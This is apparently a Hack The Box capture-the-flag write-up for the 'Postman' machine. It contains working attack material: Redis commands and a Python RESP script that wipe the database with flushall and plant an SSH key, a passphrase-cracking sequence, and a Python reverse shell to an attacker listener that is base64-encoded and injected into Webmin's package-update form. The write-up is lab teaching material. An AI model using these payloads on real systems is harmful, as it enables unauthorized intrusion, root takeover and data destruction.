[HTB] Postman — Write-up

Recon

Nmap

$ nmap -Pn --open -sC -sV -p- -T4 10.10.10.160

Initial Foothold

Redis (6379/TCP)

Redis Remote Command Execution (“RCE”)

### Creating SSH Keys (-f keeps the pair in the current directory, where the later cat/ssh commands expect it)
$ ssh-keygen -t rsa -C "bigb0ss@redis.io" -f id_rsa
### Installing redis-tools
$ apt-get install redis-tools
### Creating the Public Key File (the blank lines isolate the key from the binary RDB header/trailer that will surround it in the dump)
$ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > ssh.txt
### Writing the Public Key into Memory - redis-cli (Redis answers without authentication; flushall wipes every key on the server, so confirm scope before using it outside a lab)
$ redis-cli -h 10.10.10.160 flushall
$ cat ssh.txt | redis-cli -h 10.10.10.160 -x set crackit
### Pointing the dump at the redis user's ~/.ssh (home is /var/lib/redis) and saving it as authorized_keys
$ redis-cli -h 10.10.10.160
10.10.10.160:6379> config get dir
10.10.10.160:6379> config set dir /var/lib/redis/.ssh/
10.10.10.160:6379> config set dbfilename "authorized_keys"
10.10.10.160:6379> save
### SSH (redis) - "save" must answer OK; an error means the directory is missing or not writable and no key landed
$ chmod 600 id_rsa
$ ssh -i id_rsa redis@10.10.10.160
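The same write, done over a raw socket in the Redis wire protocol (RESP) instead of redis-cli. This is an added example, not the write-up's own tooling: it encodes the exact command sequence above, pads the key the same way, and checks the reply to save so a failed write is noticed before wasting time on SSH. The target address and home directory are the ones in the write-up; the placeholder public key is constructed and must be replaced with your own ssh-keygen output.

```python
import socket

# Target and directory from the write-up; the key below is a constructed placeholder.
TARGET = "10.10.10.160"
PORT = 6379
SSH_DIR = "/var/lib/redis/.ssh/"   # home of the redis user on this box is /var/lib/redis


def resp(*args: str) -> bytes:
    """Encode one Redis command as a RESP array of bulk strings.

    This is what redis-cli puts on the wire, so the technique works from any
    host that can open a TCP socket, with or without redis-tools installed.
    """
    out = [f"*{len(args)}\r\n".encode()]
    for a in args:
        data = a.encode()
        out.append(b"$%d\r\n%s\r\n" % (len(data), data))
    return b"".join(out)


def pad_public_key(pubkey: str) -> str:
    """Surround the key with blank lines, as the write-up's ssh.txt does.

    The RDB dump that `save` writes has a binary header and trailer around the
    stored value. sshd reads authorized_keys line by line and ignores lines it
    cannot parse, so putting the key on a line of its own keeps it usable.
    """
    return "\n\n" + pubkey.strip() + "\n\n"


def plant_key_commands(pubkey: str, ssh_dir: str = SSH_DIR) -> list:
    """The write-up's command sequence as RESP-encoded frames, in order."""
    return [
        resp("flushall"),                            # destructive: empties every keyspace
        resp("set", "crackit", pad_public_key(pubkey)),
        resp("config", "set", "dir", ssh_dir),
        resp("config", "set", "dbfilename", "authorized_keys"),
        resp("save"),
    ]


def send_commands(frames: list, host: str = TARGET, port: int = PORT, timeout: float = 5.0) -> list:
    """Send each frame and collect the raw reply for it (+OK, -ERR, or a bulk reply)."""
    replies = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        for frame in frames:
            s.sendall(frame)
            replies.append(s.recv(4096))
    return replies


def last_reply_ok(replies: list) -> bool:
    """`save` answers +OK only if Redis could open the dump path for writing.

    A -ERR here (directory missing, not writable, or CONFIG disabled) means
    authorized_keys was not written and the SSH attempt would fail.
    """
    return bool(replies) and replies[-1].startswith(b"+OK")


if __name__ == "__main__":
    import sys
    # Usage: python3 plant_key.py id_rsa.pub
    pub = open(sys.argv[1]).read() if len(sys.argv) > 1 else "ssh-rsa AAAA... constructed-placeholder"
    replies = send_commands(plant_key_commands(pub))
    for r in replies:
        print(r)
    print("authorized_keys written" if last_reply_ok(replies) else "save failed: check dir and .ssh/")
```

Because every frame is sent and acknowledged one at a time, a failure shows up at the exact step that caused it (for example CONFIG SET dir refusing a path that does not exist) rather than as a silent SSH "permission denied" later.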

User Shell (redis → Matt)

SSH Private Key Cracking — Matt

### ssh2john.py - convert the passphrase-protected private key recovered from the box (saved locally as id_rsa_matt) into a John hash
$ python ssh2john.py id_rsa_matt > id_rsa_matt_john
### Cracking with John (john --show on the same file prints the recovered passphrase afterwards)
$ john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_matt_john
### OpenSSL - remove the passphrase; it prompts for the one John recovered and writes an unencrypted copy
$ openssl rsa -in id_rsa_matt -out id_rsa_matt_decrypt
### Matt reused the key passphrase as his account password, so su from the redis shell is enough (no SSH needed)
$ su Matt

Root Shell

Webmin — Matt Password Reuse

Root Exploit #1 — Manual Approach

### python_payload.txt - reverse shell back to the attacker's listener (start it first, e.g. nc -lvnp 9001)
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.62",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
### Base64 Encoded Payload (tr strips the line wraps so the blob fits in a single form value and contains no quotes, spaces or metacharacters)
$ cat python_payload.txt | base64 | tr -d '\r\n' && echo ''
cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMTAuMTQuNjIiLDkwMDEpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVwMihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFsiL2Jpbi9zaCIsIi1pIl0pOycK
### Burp Payload - POST body of the "Update Selected Packages" form, sent with the Webmin session logged in as Matt. Webmin appends each u= value to the package command it runs as root; the second value starts with "|" so the decoded stage runs as its own pipeline, and the trailing ";" closes it.
mode=updates&search=&u=acl/apt&u=| echo -n "cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMTAuMTQuNjIiLDkwMDEpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVwMihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFsiL2Jpbi9zaCIsIi1pIl0pOycK"|base64 -d|bash;&ok=Update+Selected+Packages

Root Exploit #2 — Metasploit

Conclusion

OSCE | OSCP | CREST | Offensive Security Consultant — All about Penetration Test | Red Team | Cloud Security | Web Application Security
